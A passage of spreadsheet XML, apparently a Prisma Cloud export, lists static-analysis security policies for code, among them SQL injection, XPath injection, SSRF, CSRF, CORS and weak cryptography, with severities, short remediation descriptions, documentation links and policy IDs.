          <t>The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as "&lt;", "&gt;", and "&amp;" that could be interpreted as web-scripting elements when they are  sent to a downstream component that processes web pages.</t>
        </is>
      </c>
      <c r="X317" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-175</t>
        </is>
      </c>
      <c r="Y317" t="inlineStr"/>
      <c r="Z317" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA317" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB317" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC317" t="inlineStr">
        <is>
          <t>CKV3_SAST_175</t>
        </is>
      </c>
      <c r="AD317" t="b">
        <v>1</v>
      </c>
      <c r="AE317" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF317" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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7" t="inlineStr">
        <is>
          <t>86d4e57a-3ff5-4181-8ef6-f903575cf4d2</t>
        </is>
      </c>
      <c r="AI317" t="inlineStr"/>
      <c r="AJ317" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK317" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" t="inlineStr"/>
      <c r="B318" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C318" s="2" t="inlineStr"/>
      <c r="D318" t="inlineStr"/>
      <c r="E318" t="inlineStr"/>
      <c r="F318" t="inlineStr"/>
      <c r="G318" t="b">
        <v>1</v>
      </c>
      <c r="H3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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J318" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K318" t="inlineStr">
        <is>
          <t>AngularJS Misconfiguration Strict Contextual Escaping Disabled</t>
        </is>
      </c>
      <c r="L318" t="inlineStr"/>
      <c r="M318" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N318" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O318" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P318" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q318" t="inlineStr"/>
      <c r="R318" t="inlineStr"/>
      <c r="S318" t="inlineStr"/>
      <c r="T318" t="b">
        <v>0</v>
      </c>
      <c r="U318" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V318" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W318" t="inlineStr">
        <is>
          <t>Ensure strict contextual escaping is enabled in AngularJS configurations to prevent potential input validation issues. Avoid configurations that use $VAR.enabled(false) within the $MODULE.config function.</t>
        </is>
      </c>
      <c r="X318" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-85</t>
        </is>
      </c>
      <c r="Y318" t="inlineStr"/>
      <c r="Z318" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA318" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB318" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC318" t="inlineStr">
        <is>
          <t>CKV3_SAST_85</t>
        </is>
      </c>
      <c r="AD318" t="b">
        <v>1</v>
      </c>
      <c r="AE318" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF318" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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8" t="inlineStr">
        <is>
          <t>bffcb01b-eaa6-4f5e-9372-21dd029a7f55</t>
        </is>
      </c>
      <c r="AI318" t="inlineStr"/>
      <c r="AJ318" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK318" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" t="inlineStr"/>
      <c r="B319" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C319" s="2" t="inlineStr"/>
      <c r="D319" t="inlineStr"/>
      <c r="E319" t="inlineStr"/>
      <c r="F319" t="inlineStr"/>
      <c r="G319" t="b">
        <v>1</v>
      </c>
      <c r="H3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9" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J319" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K319" t="inlineStr">
        <is>
          <t>CSRF protection is disabled</t>
        </is>
      </c>
      <c r="L319" t="inlineStr"/>
      <c r="M319" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N319" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O319" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P319" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q319" t="inlineStr"/>
      <c r="R319" t="inlineStr"/>
      <c r="S319" t="inlineStr"/>
      <c r="T319" t="b">
        <v>0</v>
      </c>
      <c r="U319" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V319" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W319" t="inlineStr">
        <is>
          <t>A CSRF attack involves tricking a user into performing unintended sensitive actions, such as profile updates or sending messages, often via malicious links or hidden web requests using the victim's authentication cookies.</t>
        </is>
      </c>
      <c r="X319" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-25</t>
        </is>
      </c>
      <c r="Y319" t="inlineStr"/>
      <c r="Z319" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA319" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB319" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC319" t="inlineStr">
        <is>
          <t>CKV3_SAST_25</t>
        </is>
      </c>
      <c r="AD319" t="b">
        <v>1</v>
      </c>
      <c r="AE319" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF319" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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9" t="inlineStr">
        <is>
          <t>d3118387-d460-4806-82b6-0559a8fe2545</t>
        </is>
      </c>
      <c r="AI319" t="inlineStr"/>
      <c r="AJ319" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK319" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" t="inlineStr"/>
      <c r="B320" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C320" s="2" t="inlineStr"/>
      <c r="D320" t="inlineStr"/>
      <c r="E320" t="inlineStr"/>
      <c r="F320" t="inlineStr"/>
      <c r="G320" t="b">
        <v>1</v>
      </c>
      <c r="H3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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J320" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K320" t="inlineStr">
        <is>
          <t>Improper neutralization of data within XPath expressions ('XPath Injection')</t>
        </is>
      </c>
      <c r="L320" t="inlineStr"/>
      <c r="M320" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N320" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O320" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P320" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q320" t="inlineStr"/>
      <c r="R320" t="inlineStr"/>
      <c r="S320" t="inlineStr"/>
      <c r="T320" t="b">
        <v>0</v>
      </c>
      <c r="U320" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V320" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W320" t="inlineStr">
        <is>
          <t>The application processes `XPath` queries with potentially malicious input. An adversary who is able to control the XPath query could potentially bypass protections To protect against XPath injection, user input should be parameterized using a variable resolver.</t>
        </is>
      </c>
      <c r="X320" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-119</t>
        </is>
      </c>
      <c r="Y320" t="inlineStr"/>
      <c r="Z320" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA320" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB320" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC320" t="inlineStr">
        <is>
          <t>CKV3_SAST_119</t>
        </is>
      </c>
      <c r="AD320" t="b">
        <v>1</v>
      </c>
      <c r="AE320" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF320" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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0" t="inlineStr">
        <is>
          <t>4ac380e4-9bdb-49b2-8bdc-030693f21d80</t>
        </is>
      </c>
      <c r="AI320" t="inlineStr"/>
      <c r="AJ320" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK320" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" t="inlineStr"/>
      <c r="B321" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C321" s="2" t="inlineStr"/>
      <c r="D321" t="inlineStr"/>
      <c r="E321" t="inlineStr"/>
      <c r="F321" t="inlineStr"/>
      <c r="G321" t="b">
        <v>1</v>
      </c>
      <c r="H3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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J321" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K321" t="inlineStr">
        <is>
          <t>Hash used without salt</t>
        </is>
      </c>
      <c r="L321" t="inlineStr"/>
      <c r="M321" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N321" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O321" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P321" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q321" t="inlineStr"/>
      <c r="R321" t="inlineStr"/>
      <c r="S321" t="inlineStr"/>
      <c r="T321" t="b">
        <v>0</v>
      </c>
      <c r="U321" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V321" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W321" t="inlineStr">
        <is>
          <t>Uses a one-way cryptographic hash against an input that should not be reversible, such as a password, without using a salt as part of the input</t>
        </is>
      </c>
      <c r="X321" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-34</t>
        </is>
      </c>
      <c r="Y321" t="inlineStr"/>
      <c r="Z321" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA321" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB321" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC321" t="inlineStr">
        <is>
          <t>CKV3_SAST_34</t>
        </is>
      </c>
      <c r="AD321" t="b">
        <v>1</v>
      </c>
      <c r="AE321" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF321" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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1" t="inlineStr">
        <is>
          <t>a3dae57d-ba34-427b-ba5e-c3f6bea81bbf</t>
        </is>
      </c>
      <c r="AI321" t="inlineStr"/>
      <c r="AJ321" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK321" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" t="inlineStr"/>
      <c r="B322" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C322" s="2" t="inlineStr"/>
      <c r="D322" t="inlineStr"/>
      <c r="E322" t="inlineStr"/>
      <c r="F322" t="inlineStr"/>
      <c r="G322" t="b">
        <v>1</v>
      </c>
      <c r="H3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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J322" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K322" t="inlineStr">
        <is>
          <t>Improper certificate validation with HTTP client</t>
        </is>
      </c>
      <c r="L322" t="inlineStr"/>
      <c r="M322" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N322" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O322" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P322" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q322" t="inlineStr"/>
      <c r="R322" t="inlineStr"/>
      <c r="S322" t="inlineStr"/>
      <c r="T322" t="b">
        <v>0</v>
      </c>
      <c r="U322" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V322" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W322" t="inlineStr">
        <is>
          <t>The org.apache.http.impl.client.DefaultHttpClient and javax.net.ssl.SSLContext.getInstance don't verify hostnames, posing a risk of data interception or malicious transmission. Avoid using deprecated DefaultHttpClient. Opt for java.net.http.HttpClient from Java 9, which offers automatic TLS validation, ensuring secure connections.</t>
        </is>
      </c>
      <c r="X322" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-110</t>
        </is>
      </c>
      <c r="Y322" t="inlineStr"/>
      <c r="Z322" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA322" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB322" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC322" t="inlineStr">
        <is>
          <t>CKV3_SAST_110</t>
        </is>
      </c>
      <c r="AD322" t="b">
        <v>1</v>
      </c>
      <c r="AE322" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF322" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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2" t="inlineStr">
        <is>
          <t>2025e1ef-4b0d-44a2-b7fc-ee9c7d776f1e</t>
        </is>
      </c>
      <c r="AI322" t="inlineStr"/>
      <c r="AJ322" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK322" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" t="inlineStr"/>
      <c r="B323" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C323" s="2" t="inlineStr"/>
      <c r="D323" t="inlineStr"/>
      <c r="E323" t="inlineStr"/>
      <c r="F323" t="inlineStr"/>
      <c r="G323" t="b">
        <v>1</v>
      </c>
      <c r="H3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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J323" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K323" t="inlineStr">
        <is>
          <t>Encryption Keys are less than 16 bytes</t>
        </is>
      </c>
      <c r="L323" t="inlineStr"/>
      <c r="M323" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N323" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O323" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P323" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q323" t="inlineStr"/>
      <c r="R323" t="inlineStr"/>
      <c r="S323" t="inlineStr"/>
      <c r="T323" t="b">
        <v>0</v>
      </c>
      <c r="U323" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V323" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W323" t="inlineStr">
        <is>
          <t>Ensure that encryption keys are of size 16 bytes or higher</t>
        </is>
      </c>
      <c r="X323" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-33</t>
        </is>
      </c>
      <c r="Y323" t="inlineStr"/>
      <c r="Z323" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA323" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB323" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC323" t="inlineStr">
        <is>
          <t>CKV3_SAST_33</t>
        </is>
      </c>
      <c r="AD323" t="b">
        <v>1</v>
      </c>
      <c r="AE323" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF323" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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3" t="inlineStr">
        <is>
          <t>b7e4aa6e-583d-4930-b966-1ad5151fa377</t>
        </is>
      </c>
      <c r="AI323" t="inlineStr"/>
      <c r="AJ323" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK323" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" t="inlineStr"/>
      <c r="B324" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C324" s="2" t="inlineStr"/>
      <c r="D324" t="inlineStr"/>
      <c r="E324" t="inlineStr"/>
      <c r="F324" t="inlineStr"/>
      <c r="G324" t="b">
        <v>1</v>
      </c>
      <c r="H3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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J324" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K324" t="inlineStr">
        <is>
          <t>Permissive cross-domain policy with untrusted domains using servlet</t>
        </is>
      </c>
      <c r="L324" t="inlineStr"/>
      <c r="M324" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N324" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O324" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P324" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q324" t="inlineStr"/>
      <c r="R324" t="inlineStr"/>
      <c r="S324" t="inlineStr"/>
      <c r="T324" t="b">
        <v>0</v>
      </c>
      <c r="U324" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V324" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W324" t="inlineStr">
        <is>
          <t>The application might let users input values for the Access-Control-Allow-Origin header, a part of CORS. This can let attackers force clients to send credentials to malicious servers. Coupled with vulnerabilities like XSS, it becomes riskier. To fix, avoid using user data for setting this header. Hardcode allowed domains and use a lookup reference.</t>
        </is>
      </c>
      <c r="X324" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-162</t>
        </is>
      </c>
      <c r="Y324" t="inlineStr"/>
      <c r="Z324" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA324" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB324" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC324" t="inlineStr">
        <is>
          <t>CKV3_SAST_162</t>
        </is>
      </c>
      <c r="AD324" t="b">
        <v>1</v>
      </c>
      <c r="AE324" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF324" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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4" t="inlineStr">
        <is>
          <t>3a302e91-6c56-47ef-9665-251e146e6455</t>
        </is>
      </c>
      <c r="AI324" t="inlineStr"/>
      <c r="AJ324" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK324" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" t="inlineStr"/>
      <c r="B325" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C325" s="2" t="inlineStr"/>
      <c r="D325" t="inlineStr"/>
      <c r="E325" t="inlineStr"/>
      <c r="F325" t="inlineStr"/>
      <c r="G325" t="b">
        <v>1</v>
      </c>
      <c r="H3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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J325" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K325" t="inlineStr">
        <is>
          <t>Request exposed to SQL injection</t>
        </is>
      </c>
      <c r="L325" t="inlineStr"/>
      <c r="M325" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N325" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O325" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P325" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q325" t="inlineStr"/>
      <c r="R325" t="inlineStr"/>
      <c r="S325" t="inlineStr"/>
      <c r="T325" t="b">
        <v>0</v>
      </c>
      <c r="U325" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V325" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W325" t="inlineStr">
        <is>
          <t>Detected an vulnerable when generating SQL queries that vulnerable to SQL injection</t>
        </is>
      </c>
      <c r="X325" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-51</t>
        </is>
      </c>
      <c r="Y325" t="inlineStr"/>
      <c r="Z325" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA325" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB325" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC325" t="inlineStr">
        <is>
          <t>CKV3_SAST_51</t>
        </is>
      </c>
      <c r="AD325" t="b">
        <v>1</v>
      </c>
      <c r="AE325" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF325" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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5" t="inlineStr">
        <is>
          <t>508916d5-65f5-42ee-a6de-4fe7b45da1b4</t>
        </is>
      </c>
      <c r="AI325" t="inlineStr"/>
      <c r="AJ325" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK325" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" t="inlineStr"/>
      <c r="B326" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C326" s="2" t="inlineStr"/>
      <c r="D326" t="inlineStr"/>
      <c r="E326" t="inlineStr"/>
      <c r="F326" t="inlineStr"/>
      <c r="G326" t="b">
        <v>1</v>
      </c>
      <c r="H3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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J326" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K326" t="inlineStr">
        <is>
          <t>External control of configuration settings</t>
        </is>
      </c>
      <c r="L326" t="inlineStr"/>
      <c r="M326" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N326" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O326" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P326" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q326" t="inlineStr"/>
      <c r="R326" t="inlineStr"/>
      <c r="S326" t="inlineStr"/>
      <c r="T326" t="b">
        <v>0</v>
      </c>
      <c r="U326" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V326" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W326" t="inlineStr">
        <is>
          <t>Ensure you monitor data extracted from request parameters or headers. Use caution when storing in maps and always validate before populating objects.</t>
        </is>
      </c>
      <c r="X326" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-107</t>
        </is>
      </c>
      <c r="Y326" t="inlineStr"/>
      <c r="Z326" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA326" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB326" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC326" t="inlineStr">
        <is>
          <t>CKV3_SAST_107</t>
        </is>
      </c>
      <c r="AD326" t="b">
        <v>1</v>
      </c>
      <c r="AE326" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF326" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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6" t="inlineStr">
        <is>
          <t>2dbd84ea-38c7-4c26-95fd-87bc3ac2fc70</t>
        </is>
      </c>
      <c r="AI326" t="inlineStr"/>
      <c r="AJ326" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK326" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" t="inlineStr"/>
      <c r="B327" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C327" s="2" t="inlineStr"/>
      <c r="D327" t="inlineStr"/>
      <c r="E327" t="inlineStr"/>
      <c r="F327" t="inlineStr"/>
      <c r="G327" t="b">
        <v>1</v>
      </c>
      <c r="H3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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J327" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K327" t="inlineStr">
        <is>
          <t>Server Side Request Forgery</t>
        </is>
      </c>
      <c r="L327" t="inlineStr"/>
      <c r="M327" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N327" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O327" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P327" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q327" t="inlineStr"/>
      <c r="R327" t="inlineStr"/>
      <c r="S327" t="inlineStr"/>
      <c r="T327" t="b">
        <v>0</v>
      </c>
      <c r="U327" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V327" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W327" t="inlineStr">
        <is>
          <t>Server-Side-Request-Forgery (SSRF) exploits backend systems that initiate requests to third parties. If user input is used in constructing or sending these requests, an attacker could supply malicious data to force the request to other systems or modify request data to cause unwanted actions.</t>
        </is>
      </c>
      <c r="X327" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-124</t>
        </is>
      </c>
      <c r="Y327" t="inlineStr"/>
      <c r="Z327" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA327" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB327" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC327" t="inlineStr">
        <is>
          <t>CKV3_SAST_124</t>
        </is>
      </c>
      <c r="AD327" t="b">
        <v>1</v>
      </c>
      <c r="AE327" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF327" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
